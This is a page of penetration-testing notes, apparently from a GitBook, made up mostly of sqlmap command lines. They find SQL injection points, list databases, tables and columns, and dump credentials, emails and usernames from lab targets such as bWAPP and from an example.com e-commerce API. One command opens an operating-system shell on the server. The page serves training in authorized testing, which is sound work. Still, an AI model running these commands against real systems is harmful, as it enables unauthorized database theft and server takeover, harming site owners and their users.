# 4.3.6 SQLMap

## **SQLMap**

```bash
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

sqlmap -u "http://10.10.10.10/file.php?id=1" -p id          #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"      #POST Method
```

### **Get database if injection Exists**

```bash
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs    #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs    #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method

# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
```

### **Get Tables in a Database**

```bash
sqlmap -r login.req -D dbname --tables    #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables    #if tables not available, guess tables using common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables        #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method
```

### **Get data in a Database tables**

```bash
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump      #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump   #POST Method
```

### **Get OS-Shell**

```bash
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell
```

## **Example of usage**

### **Dumping emails from a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump
```

**Common parameters**

* `-u`: The vulnerable URL.
* `-p`: The parameter you suspect is injectable.
* `--dbms=mysql`: You know the backend DBMS is MySQL.
* `--level=5 --risk=3`: Enables deeper and riskier tests.
* `--technique=EUBT`: Restricts the type of SQLi techniques used (Error, Union, Boolean, Time-based).
* `-D ecommerce`: Targeting the `ecommerce` database.
* `-T users`: Looking into the `users` table.
* `-C email`: Only extracting the `email` column.
* `--dump`: Actually retrieves the data.

### **Listing columns of a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Dumping usernames**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump
```

### **Listing columns of the `users` table again (can be used for planning further dumps)**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Enumerating tables with specific prefix/suffix**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables
```

{% content-ref url="<https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap>" %}
[SQLMap](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap)
{% endcontent-ref %}